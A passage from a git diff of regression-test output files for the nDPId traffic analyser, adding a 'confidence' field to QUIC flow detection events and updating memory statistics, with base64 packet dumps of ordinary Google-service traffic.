/MIc7\/KuaqI9NjMgaFSVmEVWOH4WbQci9HsoHbnpJWe8KeP3p1LSqGOSM6yXozbpkk0hMRvAJ\/Gnzq8KxN6H6U"}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388088469,"flow_last_seen":1592388088469,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1592388088469,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.googletagmanager.com","user_agent":"Chrome\/83.0.4103.101 Android 8.0.0; LDN-L21"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388088469,"flow_last_seen":1592388088469,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1592388088469,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.googletagmanager.com","user_agent":"Chrome\/83.0.4103.101 Android 8.0.0; LDN-L21"}}
 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388088511,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"ts_msec":1592388088511,"pkt":"AAAAAAAAABAAH2tiCABFAABGAABAADgRTf64l8Ht+JCBkwG7mSMAMgZJwVEwNTAACN9KCJ5O\/156AEAYUqG2lTe2LeIe+Cm8S2sDMjR\/1C7uy5\/p"}
 02258{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592388088591,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1592388088591,"pkt":"AAAAAAAAABAAH2tiCABFAAViAABAADgRSOK4l8Ht+JCBkwG7mSMFTuaIwlEwNTAACN9KCJ5O\/156AEU0EsFIWbfyiDTriLZoVpXe8mBihbaaK+GuQgLUM2k18a9drw\/KbHYn2D+KnhueaQuI4b5RnobWiDslIfKd8Mirh6o2aIs9a9qw7cUa8PBv7bzqEIAEQzk13O3\/Bmcqazsp\/+kXQrRut7wvxnShl1xW4sNpOBXqxvlB\/nqN8wg\/PWpL9O\/FPVIgCehFv30qEPc3PeeKKCKLfVTqnxPixlqgAYeET9TKamxZDJ72\/UQ6NmlBJ28\/YXsjTDsXud+7gYqA\/RkmlBMjxYZbTaJJhQMqHb0o8hdYWan65TAd6PfEjGBDGWn2GDNSSzDYoVEizxOqWERff9oCjTo1xFO9yhHRjaWZgSFmltr5w5\/Hr6eKjmrddpc4Z+wxKpPufinLcs1Intywm6Clf6ukiL4ZIaBU1Zh4teRYOLqycNHKR892rQ3DuuxVXnpFwyl0zeIkME4yZSYiRCwgQLAMZ5FSfPbweT6hIb84RvwHrX1jO2SDi8RMi1Aevd6oV+JrNOluFTTAKRyLOen4BBBYTSn14h5EAGO0Yjv6iLbKRjvUAlFcrcWVM6\/JgP5X8XCg0n0XzSdc4uh5LhvkR\/h7IvFVZq89RpXeIhO2gstbOOib2aW\/JqKDzWo1j1Ph5gagHkB6L9a5Hjd8OSrqenRM\/Y9mJweUVKkHNmEigtNsMArIaCyxyspF5no9KUYo2Kbty26OhRt50wzulToOyP4NcHmZfEkQflkdukX3pqNAt7MXd3wyob825\/JiVxf+3hjyosU4MNO3H0eUpL9ozj7HdUKWylpVr+NEYpL6oqxrmoewXJqd9\/7HqfpRoNonB9ea0mdvP5YegQRlI+fyAKUMnIwTWXpzfIN2RNvsJqvBECokakuvOOGofWVmnplR5MVVywVaMLE82YUsCGwIntd0a+EJxQgL7mKQ6dtgeQsn1wbHWS02ZvPuWP8OYrCE67jL2v1bL6\/2h+1XCxsQAztrS+QayoAW0KvlpCNW9ac0DTJNHWRO2pghx+tJZNveH28v6DEDiBrmIsxaWJtQIYwcHaS\/T1k9TL2LCukku0Taxl6+Feh7bikCsuVDfdGwZ2pRT01H4nEVENqSGeosdtxGfJ5JRhSV8U5ag1spdFlq0h3UcT8UYP6G3yr+GnTpv73QkQAN+x4OlLFujbI1BhryJRxg9c7xx4qXcEgWlOzLD1VUeIdTUw\/9wkqyS1DOLPWvJnyAWGAWLaLCSlJLekJUN7pBX8rjCfjU7xo6oWXvXMJVSzQZFernDGNc1++8ggV6oievhZKX7xQRNWnCNZClyhkVOAkRHz4B3Pu3La7QFMMFFm3BSS2brzbRyt2jJlkAxNS9aG4l00\/e6zrsSU1aVXhBuBimpONptOjBqK0HbHQLakoucHQiK+bYxbUBefBnGFTfqhmwHZxdyKtPzhH3xEm3CA5vgkPLpEOwlHEjoUbCvszlSBn0Wji8fHC4RVgQwIFqC5GXdKL2QfiRV\/OvVRBkGEKL67PAQH2qyWcGdC4moBOq1ncmuB4DIPvYwpdxlKDGChU2pNuD6lgg74F4ueOWbMcxGtj9TFP7rZPwDq2LKcVUPI30oOBmdOZPG\/tCzNe3afxNrp9eBk\/djyjs8g0B3CLoc0Rdn7ZnCf84F4GyVSI33v4zkOEKnbfwYmbCwm+M0HtlcdG9KI8P8CfdRpGL7i2rguXb1EIkg\/EYpYXxNoWqt46R76SStqYAB32M+Hm2ZBhlK23TOEoqV6bZc6sFLkDbytR7T7rgeeKXoBeF+Tvf8o\/ifp\/T"}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1592388088469,"flow_last_seen":1592388088935,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":19594,"flow_avg_l4_payload_len":979,"midstream":0,"ts_msec":1592388088935,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1592388088469,"flow_last_seen":1592388088935,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":19594,"flow_avg_l4_payload_len":979,"midstream":0,"ts_msec":1592388088935,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic_q50.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 20/20
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600959 bytes
-~~ total memory freed........: 4600959 bytes
-~~ total allocations/frees...: 99584/99584
+~~ total memory allocated....: 4685912 bytes
+~~ total memory freed........: 4685912 bytes
+~~ total allocations/frees...: 101174/101174
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
 ~~ json string max len.......: 2263 chars
diff --git a/test/results/quic_t50.pcap.out b/test/results/quic_t50.pcap.out
index 304215b12..c41e8f03d 100644
--- a/test/results/quic_t50.pcap.out
+++ b/test/results/quic_t50.pcap.out
@@ -1,10 +1,10 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic_t50.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598618820564,"flow_last_seen":1598618820564,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1598618820564,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02259{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1598618820564,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1598618820564,"pkt":"AAAAAAAAAAQAMt+PCABFAAViUWNAAH8RmQMomn\/IpvC80cKsAbsFTtXAxVQwNTAIVV8y018p2GMAAEU0sFS4EDNRQxtqte6TPI+YvWd+9vuUhbcTQ2HBn9gQQ44SheCG4iJpKGLD8uMQU9W2hflEcgLE5fOUXsKA3b4MY34rhhWyrjNYzozZ6RzNmC3+PSlNh1B9BkCmgwrPckh0gBVa\/FiA4QpDKG9FfMxAAMJa6frV7fG1bb\/7HJhI3yISKMBJBm82DF0OyCTOye8nQRPUiVu4WsjVf6TJP0\/YCQn\/ynhi7Ht\/RBa3IPlCUHvLu303v9QUCibeTQUAguISRnIMNJe1C11ibh+BPlrVWXB5I4w7PGgaDw6mvx7JTybAMrs\/zdPmdFbLzWLaLw6FF+1T6Nf5pXJ9+kE9uEXZ6FzdZDD3MbdQ7S7fF3Xsf3z9uQukVNaW\/VEZbNqdIcOzSZA1HMEos1dDC\/4ViVIfMlO84vWzhZLxq5UvTT6qapu5oFarxgYku3nnVTzVM6SRRUR15vAoGmL3hQ542vEoyxzgRnslUtNtYNF9zlTPnOomXF1\/xSoJJI3VGlXy1gOwEOp28n6wdjsWOzKyE8z1XmBGehbXOUESC8A5oRtpkqOzQJ3g5+dnZdSYCvXi2BLHGA+OVhHokC0D92CqxGKl340PEFDaTPqzeKg+DdhCKEuu94iUqJwa\/EQr0++J\/bZoJuya3A6PiiCAsAWEfWiGB4RZfM+JuqUNIdd0StL9dWeEo7kVq9MAq9yKOBhBD0Nw0u3O6ttMqxfEm25kPEexKv+eLXlFhK9pi814az\/wL0\/CoLWlaMBTnRRk8oxhNZZKjX5cREBszdn5VN++4tz2T7E2jOZOFaOODo\/Wvb7BjuenE7CpgjdjsnLE4Tn\/b4Q53nG\/TvK7\/82EKBXRq\/c5PKnM+b1ENV06F0Dt6cGZ80l0g1EXbz82dUS02CP8vLgamNhFvRmwk0Fytrw6YCdOz2pD+8LecT3ig9EfNeixeZRd4tX0VxcyI5WVzzONGrmWIw1RUeauVQKVXpwzPZA8CukmFuSLsJh+\/5N5AhFjT6YZ08Cfg8mb95WTaUR4Gcz21+e\/jxcv3N2Ucmp36VwT1\/tIEgMyHmC7IWqDmGHm0zoua0BH1NJEIxpCFxOkgrdVfA\/bFJKqQIiWn39D6QQCV9IfFHR0w3Ji8IRmUv2cmzofCCCDXIb7a1RfNYDUaRs4NsKQeKcoYbyoDk1GAb6it6FoAhucYrDmI18nx\/aim5gBIWa2dZw8lcSNFxgWB30MqUt4DZOv8SxNPiLUt+4S7VsKdmL3e9VzPcuMiIPdcykCdDjJcCNMkqrWApVw+k3MVLOUeIU51nBJ5vetMjeccL3kies1jAjqR3odF77JuN1k7xA13AyJHglJBfA9SrQAab1XP78SnPFaTVPIBb4lI+7BBbWiXiUIWbr7QDQ2M+jaZ9aeFPMMv4QQg7YuadL5n0vNmHJxgYLgQVYZUg3g+jMQJiu4KLUJuhihq+lqjYmXeKGtNpGoS9t+klWnsjGnRn75HVlDegNERH7rMuzV5M2eSrUWRcByRHbj5kRkoY6s9x4THwi9YKFtPRSzpfXx6U8\/obpT4A56m9Dtlf0uhD38f9WkHLmiBpPtKg3V58sjjLsP3l91gyKwHDq9OPXkHBllrkj\/HjirESjdb1Tretiw6j18gO7a6gj9juTcUBG0eptAXXuJv2ZyrvtGzBo7DRc8B9KbYOIeUQf7UeOsamqbXhc1aNUt5qklsGe6OvEqu\/YEHpLYtQZ9LUddfbvcwZ\/RUIOT2ImtvT6yXQ32en9NmMy+OFHh52IUE4c2meqx38en"}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598618820564,"flow_last_seen":1598618820564,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1598618820564,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.googleapis.com","user_agent":"Chrome\/85.0.4183.83 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-T050","ja3":"a2fc589336b7c13b674c1bab24655ce7","tls_supported_versions":"TLSv1.3"}}
+00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598618820564,"flow_last_seen":1598618820564,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1598618820564,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.googleapis.com","user_agent":"Chrome\/85.0.4183.83 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-T050","ja3":"a2fc589336b7c13b674c1bab24655ce7","tls_supported_versions":"TLSv1.3"}}
 02267{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1598618820569,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1598618820569,"pkt":"AAAAAAAAAAEA4e3RCABFAAViAABAADURNGem8LzRKJp\/yAG7wqwFTn46zVQwNTAACFVfMtNfKdhjAEU02pBfi6Ak9u575XrmlbdyG1ag5OIwl7285v3Nxnsw8Lwoy4F9DNlx3pltRvpYv7yRLUAj2EQdI1b8uEmcdP9Lk6QJsvFQO42M\/PbvgSv5aSBR7ADIvkagSIwjp53htGhz\/zYlUUs1e4BKFzWrzHxpBrn3tRk9tC4MHf9tUO5P3B2MeVI3O66nSXCHk1RyPj9cinn3ZjxKtRBXyqmW3s3M2KBsk8zV1XjY13hb0PYC7j36RkDDGj0hoPOlaMR3xRkchF5ijLsbftoS8ZgSl8iT+6IMAemfyOo2vM1AInYx5h0uJCKtYT1HD9yjV1obFkm9JNNq\/Q3d32M9ltbArc4UQulBjQL30PaOFeS6\/NH6OpYAFWIaQylZhMpolrLLQtDKkYaJQK7fW\/adRXsSKcvSfS7LMOOa1iFP74PK9pOe2d+Kge3D10pHw5xvRBL5wIChQyBfmTPUKrK4rHXy82eTRRhTBKuJrbMv9T7XFHN5+H3chAvLWlrpV658DsehpWG\/heFld+bt39EMFPxrvugSLVNfbLvCnkIUyoImjdqvVj6Rx4k6hbJcFfYuU3ax\/j1wXJ1Aar7aVQydz+BiB9Fxk+eH\/qMFSF3ir3mKdIaHP3IUZOdgUkuG2UC5wWlc3438o4bvtGZ3nwifkZhkqJ0KdMIpJExGa\/AQl+d8cNAdSXLXM+DYjJis3nf2FGSiavtkGQ5gse3JeXrzKJFFtk6jcssK9h2Puqhq4IBMocJAfXnRMW\/OZ1jK+viEJjEu86fhopk0fDPB9DnWqNLuhKZbRPvi0CVdVKcq0vHFC\/pj2+NAI0Ops+2nN5yMrR4A6l\/8BcNYUJAtdstA\/Mmp+wdC\/G0p788zz8X\/NLPDa5WBeMhDBZktdXbl9oAq8mg52ggTdaTmm2jXqGKfzHqW5MClayMT0zXTwUHpjyayemAociOoR3pCM\/XoR3ULfnBs5UXukbBcD\/hcJKZpQZl3FeAMsaWvdZIbB62LlhdQiQ9E00tTktJnwHVhmpIGEmHx79qHujB4QnvSRf7rGMoi+J2+2yEf+pyZjFhJ7Vn0wek\/6YlXTjpXTJrPxdQiAfgtbMdrh0tGyM1aWelixaAL3fMRVQAbarGMmZNeVHObrG\/XRHUKe9QBmB0f2ucnxL\/Q5nZRz7iz\/WLt+LDVk7cJtCKxbiwTn6eNjrz\/eeO\/RDUWtAmn\/N2MrSP3BX63IBecgggeajGeDQeu0h0gzpQwmmr1W\/rYunSoqFFX5ouz8a\/O56eupxDBH4dlgKCLpB\/uNcGBsZbZn7D0MSdEq9sU+3rGh6ZCpDREqoFoM\/ePe6ZBwYyN5DfQ5S5xtM5Kx9nzgR0ma7na5nF+l+ByRUVDDcg+R6gDDtX7u7VAfvqTRqMCFrcyF0SqjD73Dx+5jJbDcuF3krsh5cUsmC3ty8BDoVGSf11axnldbf8\/lHSYOw4ulZJKq\/sTz5UxTVW5laCNJjqlY7Z8a7ZX\/gPYZni6DK3sKH\/pwfLD+eJvhi5gUZcI6y+TKOWHX3m7F7jI+o6kmuivTUhAHO0tp8eeKahEg274V6OXbr5gKp+A0ojgsX7ZyT\/qEOZyQW+ZVLpcoLdNi4viDD0P3Ti\/0+eMAJFCD83SXHZE7s3ktIEr1gJA+f8pz2foQ3UUo5VMFxosbOpW130fJlD\/iAqO7lnIbBAljSuAijWA4Tsc5zdOymoeY9QwWVkg13iiuc7J90lC+Sy8otpTVHsB262zMGncSESaXB5zznflxo7CBcJpN5BfwnB6hHSOc+uG"}
 02263{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1598618820678,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1598618820678,"pkt":"AAAAAAAAAAEA4e3RCABFAAViAABAADURNGem8LzRKJp\/yAG7wqwFTgvc71QwNTAACFVfMtNfKdhjRTVAGOq\/R1tSJ490cCgCIJtMuLgnF7hKWcwUWGCG1yeUQra8M2IbabEbv3t9rDs1mKoSxG0o1SwNZg+TYNjx60XPnxlQjdaPemBfWHhyIShS\/FwerrScOvQMg46Oklvwr2FyLIMnAlNL\/mWc7+8747IMQbAPr5vlwnAdmo2qfZtYMtdIW1xhXCBxR7JJFwiBMgxW++zHicn7moaT8\/+bDZ+HzEepJeBYrSVteiS0BK0n6cCyVowGk\/PbfkfkASgXD5BG61Cd+nr8Af7qfQdcKurj0yyrH5h1viElvy4SUonTnuNRTXgRmkWFI5Dx655anVNEDyyIA+LInCwiGE39JR+co6yzHCype7nL72Nq+jikfQUPfI883b5MrQ9rngGiZ8\/Xj8lYP\/QZ3\/ogby7k8+EqRcwwLdrKtF5JCPQHA47uMBlHe04rS8i00HZ6nSli4gEiz6jamp06cf0n39bZgvUQjAKf0ERdv971hRGdG0miD7H3QBKDkYd3jMMaCW0xLn2JbaBK1oc8XsPcVUeGlwQmCRwBHHJ8Zi5U2cVPlHrY4uUezGQwo3VZ3r5q95rt435Cj51jZ28FqxsNIE11PMXbcj4IXggGlyQVSDdlQV8ySpernoTOLJ7ESEF3t54ex\/kmX4c4cMPX9ddsiAY5den0AJP0\/NiKWL3LrUSrEOm8wr\/TSwK8v7YyoUXFr0q9WzgNo3XQrwUtAlQBmFb24DGYwbS+3XNGulanTnYpBrsb5c1rh0p91mAhQ\/rpURoxrNHqQru2XnDOVB85T41pLYZBM1fI2jpefgEQe9S28IEB\/1eLwrRuiU\/FIh6zJnowpUGRMkPEcli\/a9qk4i1KUhncByKhdd\/9ipm3FA0L0wwJh9k7FyhUMixNB17ijKhZ9gdil7oXiNMdx124Nmzbbk5lrjKivTcJ9RPINOAPRUQFR1RdL0N6Kq0CLXSzCDdZdLrY9En+mVKeYQj0xo\/jR18exhwt\/eRGfcgKxU3vj0n7pPV2efcnGnYI\/qnwevG1XcNdzUDvV4mVcXNvYEPxKSNdhD7Gpk6sGnaPSQTI2HNf0HmdlyCkLZSrpVeHOY4fveiP4Adr8M05Zxd0p3+8DcvQwP4QYKb2558+ox1mWrMBcDoH8rfM8Obyh3XuvPIl+jImNEF6BP6N3059LnOdatU9xWrsdLNJEgvG9u60Lk7nUNGZtXy46J65s6wF0c50NT+RmqoC2LZher4uoex39pj1K8V7kaJv3pcV1GjZn7eaJfrytSHHD08EAQGGAMIFMRg6nHfi8XeYIO3oF5hSYGXvUcdNd7WIgnidI\/Dzin6YMvkS0sgovzeBscolAktAP7weC3mq1LIaKYgNt2UsL8d9KL8\/n8B6R\/Yt81QFXYZf8g3+P4tPy\/kkSsNIfvswl3y0LDlhheLGqrpmqC8lIBGwv8YQXlaspfmVjHdirPP2SwJhDXPOI7i0j92jF26bcCvOi\/MymU9+Eb7WBD7jBktqD9MQhYDPOR1XZV0o4Os8ysZy\/WuU9JD6fru3jsr\/kKCqPguqlfF+W\/br9kviTd3\/eB4VY8p+7Zw2IhUhbAAnr8CvfrB2S\/TOapOVIXCtl3VT4kPt7qxNllSaLAB7HZ0kifbilO2MEKf7JHrUnpsA6AJyeHwuLS7wsXBPwyB\/OuLAVAq7ZLX3Aej45laD+jKQmWnX35iCvC2Lk0iNpz0KaPylARDD4R6xtjFuUiuuiD+\/VDor8Z42laVln8rezBVKWbgIJ0+RzyJkUTKFz9D8WmujYRQ1"}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1598618820564,"flow_last_seen":1598618820984,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":7916,"flow_avg_l4_payload_len":659,"midstream":0,"ts_msec":1598618820984,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1598618820564,"flow_last_seen":1598618820984,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":7916,"flow_avg_l4_payload_len":659,"midstream":0,"ts_msec":1598618820984,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"quic_t50.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 12/12
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4600746 bytes
-~~ total memory freed........: 4600746 bytes
-~~ total allocations/frees...: 99578/99578
+~~ total memory allocated....: 4685699 bytes
+~~ total memory freed........: 4685699 bytes
+~~ total allocations/frees...: 101168/101168
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
 ~~ json string max len.......: 2272 chars
diff --git a/test/results/quic_t51.pcap.out b/test/results/quic_t51.pcap.out
index bdfdb5c3c..518fe2690 100644
--- a/test/results/quic_t51.pcap.out
+++ b/test/results/quic_t51.pcap.out
@@ -1,10 +1,10 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic_t51.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598620434413,"flow_last_seen":1598620434413,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1598620434413,"l3_proto":"ip4","src_ip":"187.227.136.152","dst_ip":"211.247.147.90","src_port":55356,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02253{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_t51.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1598620434413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1598620434413,"pkt":"AAAAAAAAAAgAH83gCABFAAViXjpAAH8R7IK744iY0\/eTWtg8AbsFTvswwVQwNTEI\/5QVtbAFhg0AAEU0lc1seKsogM0xJ2my4Aiqph+R\/2N2Tlopv6L1CTJ74mgIopdeTMsbdYmmZHP80OXizzota6YFHVZ9VeAcEZo8pgEgiYZUg70bNed022uBY2n4AIBJaoTaZc4dlK\/B4TiUFC+WiYMdxcvH3S2VlmhK+Rc2gUQHqAYLkzqvz5M6NYLldilKxcCw\/ToJ+zu5fHTAbQipFFqbD95GLa7oBCU7jPE\/wj2QE1M9Wk52+SrgbNiKCHm0Oi8\/\/aC+8QR8oPQVWsQzjkcyagMWDaycHo+Z2gh2YqGCJoepFNsqgtO8uWWNDiaisHNHQDCPrCt5EDVvLMLkZZQTcE9bxIhJucB4CNr926kRAjaB4Y5CqDAEear5TtCJ3Iu0C2bzBjoi5J9LPiwVBQYhfxtqGdX9O3nANKjdbMVqvYl742MGo2YFm2J507oPMBXLqPJW2a2j\/XlrdIcqLJLXy1ruiet2Yfof5cTaMXQp6wyOq8s2kLEeb0RqG380zHAhUvwTfCiEYvwSN8+LPb7d1HKu3JRvbfM4A2u6D3\/ccc40B8jpt6t8mVTCa92M7s8hgVfDHCvoiaTxRF07ULZWTbuRFjLXA3G\/QLzl0b2QQA3PRqMO1r4YLM9IhL+9TjIm9kskk81nFsbcqeUPPCIl5SvakooZ1Ne4vlHJM7vcPwHkRJHa+PMjtknf1D9FmcaRoK2gywFTRk2j2RKXeNNGP3fOGBMRmVstntMO9HlCQR0pqWkIJ+jw+vDqFHMVZBwco3px5tJKsYik1W4I7vDVokn8tYkCXuWkDqmw9KvnktOeNU+eoLbnbQi\/AJnaCX22\/pOnvMBDUqcAEyxhhPUDxacTTuyCy01g9D7qNJmA